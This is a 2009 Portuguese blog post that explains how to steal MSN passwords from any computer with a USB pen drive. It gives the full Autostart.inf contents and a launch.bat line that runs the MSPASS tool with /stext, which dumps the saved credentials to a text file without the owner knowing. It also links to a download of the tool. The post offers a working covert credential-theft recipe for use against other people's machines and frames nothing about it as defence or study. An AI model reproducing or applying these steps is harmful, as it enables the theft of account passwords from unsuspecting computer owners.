Pegar senhas do MSN pelo Pen-Drive

by Vinny | quinta-feira, janeiro 22, 2009 in , , |

A primeira coisa que você precisa é de um pen-driver U3 USB-Stick. (Isto é ele Funciona automaticamente).Então vc Faz o Download do Software MSPASS:Abra seu pendriver e crie um documento de texto chamado Autostart.
Vc deverá escrever isso nele:[Autostart]open=launch.batACTION = meuusb(Depois de escrever isto você tem que salvar o arquivo como "Autostart.inf", "meuusb" é obviamente o nome do pendriver: D). Então crie uma pasta chamada mspass, nesta pasta você copiar o mspass.exe que vc baixou.Então você cria um arquivo . Bat, que é chamado launch.bat
neste arquivo você escreve start mspass\mspass.exe /stext mspass.txt OK isso é tudo que você tem que fazer.Você colocar o o seu pen driver em qualquer computador, o autostart.inf lançará o mspass. Depois de alguns segundos você pode remover o pendriver USB, e haverá uma arquivo novo . Txt em que o msn e a senha estará escrito.

http://img296.imageshack.us/img296/8084/msnusbla2.png


Tamanho: 0,1Mb
Formato: RAR
Hospedagem: EasyShare


Iniciar Download




0 comentários:

Aviso

Este site não hospeda nenhum ficheiro. Apenas contem links para outras paginas disponíveis na Internet. Faca os downloads somente para teste, devendo de seguida apaga-los. Se gostar compre, somos totalmente a favor da preservação dos direitos autorais.
PageRank

Estátisticas


Seguidores

Recados

Parceiros

Windows e Linux

Banner